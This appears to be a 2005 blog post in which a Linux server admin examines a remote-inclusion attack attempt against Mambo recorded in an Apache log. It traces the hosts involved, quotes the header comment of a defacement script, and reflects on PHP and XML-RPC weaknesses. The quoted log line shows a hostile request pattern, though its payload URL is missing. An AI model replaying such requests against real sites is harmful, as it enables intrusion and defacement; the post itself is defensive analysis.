I am seeing attacks on popular open-source software that runs on linux, e.g. - - [29/Nov/2005:23:00:48 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST
HTTP/1.1" 404 293 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1;)"
(I have broken the line up to fit. It's one entry, or request, from my Apache 2.0 log file. It's a Fedora Core 4 install, mostly default.)
These are slightly more complex attacks, and they show the difficulty of tracking down your attacker. The requester, tracks here: optikom2.inw.tu-graz.ac.at, -- the Graz University of Technology in Austria. But the request is calling a script from here: lilo.pjwstk.edu.pl, the POLSKO-JAPONSKA WYZSZA SZKOLA TECHNIK KOMPUTEROWYCH in Poland. It uses more code from here: pc01.irce.tue.nl , someone's computer in the Netherlands. Finally, it looks like this server gets notified: www.lbsschrems.at, WVNET Information und Kommunikation GmbH, somone's server in Austria. That server is running phpGroupWare, and has probably already been compromised and is now being used to compromise other machines. You could check for bugs in phpGroupWare, but their server's down.
The code here,, appears to be something in C that requires some include files. The initial script, here: is a defacement script. Note that it doesn't open in Netscape -- just IE.
<!-- Defacing Tool 2.0 by r3v3ng4ns revengans@gmail.com se for modificar o codigo, por favor, mantenha o nome de seus autores originais e por favor, entre em contato comigo... ae galera, serio, tem mta gente fdp q simplismente usa, nao seja soh um sucker do script, n seja um lammer imbecil, n seja o merda dum script kiddie, n seja um babaca, ajude a melhora-lo tambem!! -->
At least our script writer left us his email address. He just wrote the code, of course, he's not the one trying to use it to deface a site. Right. There were additional lines in my Apache log file that showed attacks against other applications (not installed on my box): wordpress, phpgroupare, drupal and awstats. What weakness do these applications have in common? Xml-rpc on php.
It looks like Apache needs a tool similar to Windows/IIS's urlscan, which prevents attacks like these from getting to the webserver in the first place. These attacks are increasingly common, but there's no newspaper headlines, as was the case with attacks that took advantage of Microsoft vulnerabilities. These don't attack a single product, but holes in applications that are built on the ability to run things at the command line from a web request. It makes for great functionality and weak security.
Weak web applications may mean your firewall is really just a router for port 80 traffic.